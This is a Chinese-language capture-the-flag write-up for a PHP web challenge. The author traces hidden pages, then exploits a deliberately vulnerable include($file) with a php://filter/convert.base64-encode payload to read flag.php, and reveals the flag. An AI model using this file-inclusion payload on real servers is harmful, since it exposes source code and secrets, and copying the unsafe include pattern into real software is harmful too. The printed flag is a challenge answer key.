进去环境,直接F12看看都有啥
发现唯一有价值的就是给了一个/Archive_room.php的提示
我们把/Archive_room.php输到网址里看看能出来什么(O_o)??
好家伙,给了一个按钮,发现按下以后要跳转到./action.php,那我们就点进去看看跳转
?end.php?我action呢?看起来应该是要burp抓包看看action是什么了
来一次重放,发现后面出现了secr3t.php的注释,那就进去看看
发现出现了网页代码
1 <html> 2 <title>secret</title> 3 <meta charset="UTF-8"> 4 <?php 5 highlight_file(__FILE__); 6 error_reporting(0); 7 $file=$_GET[‘file‘]; 8 if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ 9 echo "Oh no!"; 10 exit(); 11 } 12 include($file); 13 //flag放在了flag.php里 14 ?> 15 </html>
flag放在flag.php里,第8行还存在fliter的漏洞,flag真的在flag.php里面直接显示出来我信你个鬼
还不是要靠php://fliter
构造payload:
?file=php://filter/convert.base64-encode/resource=flag.php
页面下方出现base64,解码可得:
1 <!DOCTYPE html> 2 3 <html> 4 5 <head> 6 <meta charset="utf-8"> 7 <title>FLAG</title> 8 </head> 9 10 <body style="background-color:black;"><br><br><br><br><br><br> 11 12 <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br> 13 14 <p style="font-family:arial;color:red;font-size:20px;text-align:center;"> 15 <?php 16 echo "我就在这里"; 17 $flag = ‘flag{4aa73f9a-0b37-44be-99ef-6cea8cd5cfe1}‘; 18 $secret = ‘jiAng_Luyuan_w4nts_a_g1rIfri3nd‘ 19 ?> 20 </p> 21 </body> 22 23 </html>
flag{4aa73f9a-0b37-44be-99ef-6cea8cd5cfe1}